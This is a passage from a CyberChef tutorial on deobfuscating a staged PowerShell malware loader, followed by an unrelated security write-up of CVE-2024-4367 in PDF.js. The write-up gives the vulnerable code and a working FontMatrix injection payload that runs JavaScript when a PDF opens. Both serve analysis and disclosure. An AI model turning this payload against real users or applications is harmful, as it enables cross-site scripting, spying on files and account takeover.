  • Use a Merge operation to enable analysis of the 2nd stage script. 

Operation 1 — Extracting Subtraction Value

The initial subtraction value can be extracted with a register operation and regular expression. 

This must be done prior to additional analysis and decoding to ensure that the subtraction value is stored inside of a register.

Operation 2 — Extracting the Decimal Array

The second step is to extract out the main decimal array using a regular expression and a capture group. 

The capture group ensures that we are isolating the decimal values and ignoring any script content surrounding it. 

This regex looks for decimals or commas 

[\d,]
 of length 1000 or more 
{1000,}
. That are surrounded by round brackets 
\(
 and 
\)

The inner brackets without escapes form the capture group.

Operation 3 — Separating the Decimal Values

The third operation leverages a Fork to separate the decimal values and act on each of them independently. 

The Fork defines a delimiter at the commas present in the original code, and specifies a Merge Delimiter of 

\n
 to improve readability.

Operation 4 — Appending the Subtraction Value

The fourth operation uses a regex find/replace to append the 787 value to the end of each line created by the forking operation. 

Note that we have used 

(.*)
 to capture the original decimal value, and have then used 
$1
 to access it again. The 
$R0
 is used to access the register that can created in Operation 1.

Operation 5 — Subtracting the Values

We can now perform the subtraction operation after appending the 787 value in Operation 4. 

This produces the original ASCII char codes that form the second stage script. 

Note that we have specified a space delimiter, as this is what separates our decimal values from our subtraction values in operation 4.

Operation 6 — Decoding ASCII Code In CyberChef

We can now decode the ASCII codes using a «From Decimal» operation. 

This produces the original script. However, the values are separated via a newline due to our previous Fork operation.

Operation 7 — Merging the Result

We now want to act on the new script in it’s entirety, we do not want to act on each character independently. 

Hence, we will undo our forking operation by applying a Merge Operation and modifying the «Merge Delimiter» of our previous fork to an empty space.

Stage 2 — Powershell Script With AES Encryption (8 Operations)

After 7 operations, we have now uncovered a 2nd stage Powershell script that utilises AES Encryption to unravel an additional stage. 

The key points in this script that are needed for decrypting are highlighted below.

To Decode this stage, we must be able to

  • Use Registers to Extract the AES Key
  • Use Regex to extract the Base64 blob
  • Decode the Base64 blob
  • Use Registers to extract an Initialization Vector
  • Remove the IV from the output
  • Perform the AES Decryption, referencing our registers
  • Use Regex to Remove Trailing NullBytes
  • Perform a GZIP Decompression to unlock stage 3

CyberChef Operation 8 — Extracting an AES Key

We must now extract the AES Key and store it using a Register operation. 

We can do this by applying a Register and creating a regex for base64 characters that are exactly 44 characters in length and surrounded by single quotes. (We could also adjust this to be a range from 42 to 46)

We now have the AES key stored inside of the 

$R1
specifying register.

Operation 9 — Extracting the Base64 Blob

Now that we have the AES key, we can isolate the primary base64 blob that contains the next stage of the Malware. 

We can do this with a regular expression for Base64 text that is 100 or more characters in length. 

We’re also making sure to change the output format to «List Matches», as we only want the text that matches our regular expression.

Operation 10 — Decoding The Base64

This is a straightforward operation to decode the Base64 blob prior to the main AES Decryption.

Operation 11 — Extracting Initialization Vector

The first 16 bytes of the current data form the initialization vector for the AES decryption. 

We can extract this using another Register operation and specifying 

.{16}
 to grab the first 16 characters from the current blob of data.

We know that these bytes are the IV due to this code in the original script. 

Note how the first 16 bytes are taken after base64 decoding, and then this is set to the IV.

Operation 12 — Dropping the Initial 16 Bytes

The initial 16 bytes are ignored when the actual AES decryption process takes place. 

Hence, we need to remove them by using a 

drop bytes
 operation with a length of 
16
,.

We know this is the case because the script begins the decryption from an offset of 16 from the data.

This can be confirmed with the official documentation for TransformFinalBlock.

Operation 13 — AES Decryption

Now that the Key and IV for the AES Decryption have been extracted and stored in registers, we can go ahead and apply an AES Decrypt operation. 

Note how we can access our key and IV via the $R1 and $R2 registers that were previously created. We do not need to specify a key here.


Also note that we do need to specify base64 and utf8 for the key and IV, respectively, as these were their formats at the time when we extracted them

We can also note that ECB mode was chosen, as this is the mode specified in the script.

Operation 14 — Removing Trailing Null Bytes

The current data after AES Decryption is compressed using GZIP. 

However, Gunzip fails to execute due to some random null bytes that are present at the end of the data after AES Decryption.

Operation 14 involves removing these trailing null bytes using a Regular expression for «one or more null bytes \0+ at the end of the data $»

We will leave the «Replace» value empty as we want to remove the trailing null bytes.

Operation 15 — GZIP Decompression

We can now apply a Gunzip operation to perform the GZIP Decompression. 

This will reveal stage 3 of the malicious content, which is another Powershell script.

Note that we know Gzip was used as it is referenced in stage 2 after the AES Decryption process.

Stage 3 — Powershell Script (7 Operations)

We now have a stage 3 PowerShell script that leverages a very similar technique to stage 1. 

The obfuscated data is again stored in large decimal arrays, with the number 4274 subtracted from each value. 

Note that in this case, there are 4 total arrays of integers.

To Decode stage 3, we must perform the following actions

  • Use Registers to Extract The Subtraction Value
  • Use Regex to extract the decimal arrays
  • Use Forking to Separate the arrays
  • Use another Fork to Separate the individual decimal values
  • Use a find/replace to append the subtraction value
  • Perform the Subtraction
  • Restore the text from the resulting ASCII codes

Operation 16 — Extracting The Subtraction Value with Registers

Our first step of stage 3 is to extract the subtraction value and store it inside a register. 

We can do this by creating another register and implementing a regular expression to capture the value 

$SHY=4274
. We can specify a dollar sign, followed by characters, followed by equals, followed by integers, followed by a semicolon. 

Apply a capture group (round brackets) to the decimal component, as we want to store and use this later.

Operation 17 — Extracting and Isolating the Decimal Arrays

Now that we have the subtraction key, we can go ahead and use a regular expression to isolate the decimal arrays.

We have chosen a regex that looks for round brackets containing long sequences of integers and commas (at least 30). The inside of the brackets has been converted to a capture group by adding round brackets without escapes. 

We have also selected 

List Capture Groups
new line to list only the captured decimal values and commas.

Operation 18 — Separating the Arrays With Forking

We can now separate the decimal arrays by applying a fork operation. 

The current arrays are separated by a new line, so we can specify this as our split delimiter. 

In the interests of readability, we can specify our merge delimiter as a double newline. The double newline does nothing except make the output easier to read.

Operation 19 — Separating the Decimal Values With another Fork

Now that we’ve isolated the arrays, we need to isolate the individual integer values so that we can append the subtraction value. 

We can do this with another Fork operation, specifying a comma delimiter (as this is what separates our decimal values) and a merge delimiter of newline. Again, this new line does nothing but improve readability.

Operation 20 — Appending Subtraction Values

With the decimal values isolated, we can use a previous technique to capture each line and append the subtraction key currently stored in 

$R3

We can see the subtraction key appended to each line containing a decimal value.

Operation 21 — Applying the Subtraction Operation

We can now apply a subtract operation to subtract the value appended in the previous step. 

This restores the original ASCII char codes so we can decode them in the next step.

Operation 22 — Decoding the ASCII Codes

With the ASCII codes restored in their original decimal form, we can apply a from decimal operation to restore the original text. 

We can see the 

Net.Webclient
 string, albeit it is spaced out over newlines due to our forking operation.

Final Result — Extracting Malicious URLs

Now that the content is decoded, we can remove the readability step we added in Operation 19. 

That is, we can remove the 

Merge Delimiter
 that was added to improve the readability of steps 20 and 21.

With the 

Merge Delimiter
 removed, The output of the four decimal arrays will now be displayed.

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

research by Thomas Rinsma

CVE-2024-4367 – Arbitrary JavaScript execution in PDF.js

TL;DR 

This post details CVE-2024-4367, a vulnerability in PDF.js found by Codean Labs. PDF.js is a JavaScript-based PDF viewer maintained by Mozilla. This bug allows an attacker to execute arbitrary JavaScript code as soon as a malicious PDF file is opened. This affects all Firefox users (<126) because PDF.js is used by Firefox to show PDF files, but also seriously impacts many web- and Electron-based applications that (indirectly) use PDF.js for preview functionality.

If you are a developer of a JavaScript/Typescript-based application that handles PDF files in any way, we recommend checking that you are not (indirectly) using a version a vulnerable version of PDF.js. See the end of this post for mitigation details.

Introduction 

There are two common use-cases for PDF.js. First, it is Firefox’s built-in PDF viewer. If you use Firefox and you’ve ever downloaded or browsed to a PDF file you’ll have seen it in action. Second, it is bundled into a Node module called 

pdfjs-dist
, with ~2.7 million weekly downloads according to NPM. In this form, websites can use it to provide embedded PDF preview functionality. This is used by everything from Git-hosting platforms to note-taking applications. The one you’re thinking of now is likely using PDF.js.

The PDF format is famously complex. With support for various media types, complicated font rendering and even rudimentary scripting, PDF readers are a common target for vulnerability researchers. With such a large amount of parsing logic, there are bound to be some mistakes, and PDF.js is no exception to this. What makes it unique however is that it is written in JavaScript as opposed to C or C++. This means that there is no opportunity for memory corruption problems, but as we will see it comes with its own set of risks.

Glyph rendering 

You might be surprised to hear that this bug is not related to the PDF format’s (JavaScript!) scripting functionality. Instead, it is an oversight in a specific part of the font rendering code.

Fonts in PDFs can come in several different formats, some of them more obscure than others (at least for us). For modern formats like TrueType, PDF.js defers mostly to the browser’s own font renderer. In other cases, it has to manually turn glyph (i.e., character) descriptions into curves on the page. To optimize this for performance, a path generator function is pre-compiled for every glyph. If supported, this is done by making a JavaScript 

Function
 object with a body (
jsBuf
) containing the instructions that make up the path:

// If we can, compile cmds into JS for MAXIMUM SPEED...
if (this.isEvalSupported && FeatureTest.isEvalSupported) {
  const jsBuf = [];
  for (const current of cmds) {
    const args = current.args !== undefined ? current.args.join(",") : "";
    jsBuf.push("c.", current.cmd, "(", args, ");\n");
  }
  // eslint-disable-next-line no-new-func
  console.log(jsBuf.join(""));
  return (this.compiledGlyphs[character] = new Function(
    "c",
    "size",
    jsBuf.join("")
  ));
}

From an attacker perspective this is really interesting: if we can somehow control these 

cmds
 going into the 
Function
 body and insert our own code, it would be executed as soon as such a glyph is rendered.

Well, let’s look at how this list of commands is generated. Following the logic back to the 

CompiledFont
 class we find the method 
compileGlyph(...)
. This method initializes the 
cmds
 array with a few general commands (
save
transform
scale
 and 
restore
), and defers to a 
compileGlyphImpl(...)
 method to fill in the actual 

compileGlyph(code, glyphId) {
    if (!code || code.length === 0 || code[0] === 14) {
      return NOOP;
    }

    let fontMatrix = this.fontMatrix;
    ...

    const cmds = [
      { cmd: "save" },
      { cmd: "transform", args: fontMatrix.slice() },
      { cmd: "scale", args: ["size", "-size"] },
    ];
    this.compileGlyphImpl(code, cmds, glyphId);

    cmds.push({ cmd: "restore" });

    return cmds;
  }

If we instrument the PDF.js code to log generated 

Function
 objects, we see that the generated code indeed contains those commands:

c.save();
c.transform(0.001,0,0,0.001,0,0);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();

At this point we could audit the font parsing code and the various commands and arguments that can be produced by glyphs, like 

quadraticCurveTo
 and 
bezierCurveTo
, but all of this seems pretty innocent with no ability to control anything other than numbers. What turns out to be much more interesting however is the 
transform
 command we saw above:

{ cmd: "transform", args: fontMatrix.slice() },

This 

fontMatrix
 array is copied (with 
.slice()
) and inserted into the body of the 
Function
 object, joined by commas. The code clearly assumes that it is a numeric array, but is that always the case? Any string inside this array would be inserted literally, without any quotes surrounding it. Hence, that would break the JavaScript syntax at best, and give arbitrary code execution at worst. But can we even control the contents of 
fontMatrix
 to that degree?

Enter the FontMatrix 

The value of 

fontMatrix
 defaults to 
[0.001, 0, 0, 0.001, 0, 0]
, but is often set to a custom matrix by a font itself, i.e., in its own embedded metadata. How this is done exactly differs per font format. Here’s the Type1parser for example:

extractFontHeader(properties) {
    let token;
    while ((token = this.getToken()) !== null) {
      if (token !== "/") {
        continue;
      }
      token = this.getToken();
      switch (token) {
        case "FontMatrix":
          const matrix = this.readNumberArray();
          properties.fontMatrix = matrix;
          break;
        ...
      }
      ...
    }
    ...
  }

This is not very interesting for us. Even though Type1 fonts technically contain arbitrary Postscript code in their header, no sane PDF reader supports this fully and most just try to read predefined key-value pairs with expected types. In this case, PDF.js just reads a number array when it encounters a 

FontMatrix
 key. It appears that the 
CFF
 parser — used for several other font formats — is similar in this regard. All in all, it looks like we are indeed limited to numbers.

However, it turns out that there is more than one potential origin of this matrix. Apparently, it is also possible to specify a custom 

FontMatrix
 value outside of a font, namely in a metadata object in the PDF! Looking carefully at the 
PartialEvaluator.translateFont(...)
 method, we see that it loads various attributes from PDF dictionaries associated with the font, one of them being the 
fontMatrix
:

const properties = {
      type,
      name: fontName.name,
      subtype,
      file: fontFile,
      ...
      fontMatrix: dict.getArray("FontMatrix") || FONT_IDENTITY_MATRIX,
      ...
      bbox: descriptor.getArray("FontBBox") || dict.getArray("FontBBox"),
      ascent: descriptor.get("Ascent"),
      descent: descriptor.get("Descent"),
      xHeight: descriptor.get("XHeight") || 0,
      capHeight: descriptor.get("CapHeight") || 0,
      flags: descriptor.get("Flags"),
      italicAngle: descriptor.get("ItalicAngle") || 0,
      ...
    };

In the PDF format, font definitions consists of several objects. The 

Font
, its 
FontDescriptor
 and the actual 
FontFile
. For example, here represented by objects 1, 2 and 3:

1 0 obj
<<
  /Type /Font
  /Subtype /Type1
  /FontDescriptor 2 0 R
  /BaseFont /FooBarFont
>>
endobj

2 0 obj
<<
  /Type /FontDescriptor
  /FontName /FooBarFont
  /FontFile 3 0 R
  /ItalicAngle 0
  /Flags 4
>>
endobj

3 0 obj
<<
  /Length 100
>>
... (actual binary font data) ...
endobj

The 

dict
 referenced by the code above refers to the 
Font
 object. Hence, we should be able to define a custom 
FontMatrix
 array like this:

1 0 obj
<<
  /Type /Font
  /Subtype /Type1
  /FontDescriptor 2 0 R
  /BaseFont /FooBarFont
  /FontMatrix [1 2 3 4 5 6]   % <-----
>>
endobj

When attempting to do this it initially looks like this doesn’t work, as the 

transform
 operations in generated 
Function
 bodies still use the default matrix. However, this happens because the font file itself is overwriting the value. Luckily, when using a Type1 font without an internal 
FontMatrix
 definition, the PDF-specified value is authoritative as the 
fontMatrix
 value is not overwritten.

Now that we can control this array from a PDF object we have all the flexibility we want, as PDF supports more than just number-type primitives. Let’s try inserting a string-type value instead of a number (in PDF, strings are delimited by parentheses):

/FontMatrix [1 2 3 4 5 (foobar)]

And indeed, it is plainly inserted into the 

Function
 body!

c.save();
c.transform(1,2,3,4,5,foobar);
c.scale(size,-size);
c.moveTo(0,0);
c.restore();

Exploitation and impact 

Inserting arbitrary JavaScript code is now only a matter of juggling the syntax properly. Here’s a classical example triggering an alert, by first closing the 

c.transform(...)
 function, and making use of the trailing parenthesis:

/FontMatrix [1 2 3 4 5 (0\); alert\('foobar')]

The result is exactly as expected:

Exploitation of CVE-2024-4367

You can find a proof-of-concept PDF file here. It is made to be easy to adapt using a regular text editor. To demonstrate the context in which the JavaScript is running, the alert will show you the value of 

window.origin
. Interestingly enough, this is not the 
file://
 path you see in the URL bar (if you’ve downloaded the file). Instead, PDF.js runs under the origin 
resource://pdf.js
. This prevents access to local files, but it is slightly more privileged in other aspects. For example, it is possible to invoke a file download (through a dialog), even to “download” arbitrary 
file://
 URLs. Additionally, the real path of the opened PDF file is stored in 
window.PDFViewerApplication.url
, allowing an attacker to spy on people opening a PDF file, learning not just when they open the file and what they’re doing with it, but also where the file is located on their machine.

In applications that embed PDF.js, the impact is potentially even worse. If no mitigations are in place (see below), this essentially gives an attacker an XSS primitive on the domain which includes the PDF viewer. Depending on the application this can lead to data leaks, malicious actions being performed in the name of a victim, or even a full account take-over. On Electron apps that do not properly sandbox JavaScript code, this vulnerability even leads to native code execution (!). We found this to be the case for at least one popular Electron app.

Mitigation 

At Codean Labs we realize it is difficult to keep track of dependencies like this and their associated risks. It is our pleasure to take this burden from you. We perform application security assessments in an efficient, thorough and human manner, allowing you to focus on development. Click here to learn more.

The best mitigation against this vulnerability is to update PDF.js to version 4.2.67 or higher. Most wrapper libraries like 

react-pdf
 have also released patched versions. Because some higher level PDF-related libraries statically embed PDF.js, we recommend recursively checking your 
node_modules
 folder for files called 
pdf.js
to be sure. Headless use-cases of PDF.js (e.g., on the server-side to obtain statistics and data from PDFs) seem not to be affected, but we didn’t thoroughly test this. It is also advised to update.

Additionally, a simple workaround is to set the PDF.js setting 

isEvalSupported
 to 
false
. This will disable the vulnerable code-path. If you have a strict content-security policy (disabling the use of 
eval
 and the 
Function
constructor), the vulnerability is also not reachable.

Timeline 

  • 2024-04-26 – vulnerability disclosed to Mozilla
  • 2024-04-29 – PDF.js v4.2.67 released to NPM, fixing the issue
  • 2024-05-14 – Firefox 126, Firefox ESR 115.11 and Thunderbird 115.11 released including the fixed version of PDF.js
  • 2024-05-20 – publication of this blogpost